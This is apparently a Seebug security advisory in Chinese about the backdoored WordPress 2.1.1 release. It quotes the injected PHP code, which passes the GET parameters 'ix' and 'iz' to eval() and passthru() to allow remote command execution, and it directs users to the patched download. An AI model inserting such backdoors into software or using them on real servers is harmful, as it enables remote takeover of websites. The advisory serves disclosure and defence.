Lucene search

K
seebugRootSSV:1453
HistoryMar 09, 2007 - 12:00 a.m.

Wordpress 2.1.1远程命令执行后门漏洞

2007-03-0900:00:00
Root
www.seebug.org
23

WordPress是一款免费的论坛Blog系统。

WordPress提供软件下载的网站被入侵,入侵者修改了软件代码码植入远程可执行命令的后门,远程攻击者可能利用这个后门以Web进程权限在安装了恶意版本WordPress的服务器上执行任意命令。

被修改的文件是wp-includes/feed.php和wp-includes/theme.php,被添加了如下代码:

在wp-includes/feed.php文件中:

function comment_text_phpfilter($filterdata) {
eval($filterdata);
}

if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }

eval()调用会执行通过ix变量传入的PHP代码。

在wp-includes/theme.php文件中:

function get_theme_mcommand($mcds) {
passthru($mcds);
}

if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }

passthru()会执行通过iz变量传入的PHP代码。

WordPress WordPress 2.1.1
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

<a href=“http://wordpress.org/download/” target=“_blank”>http://wordpress.org/download/</a>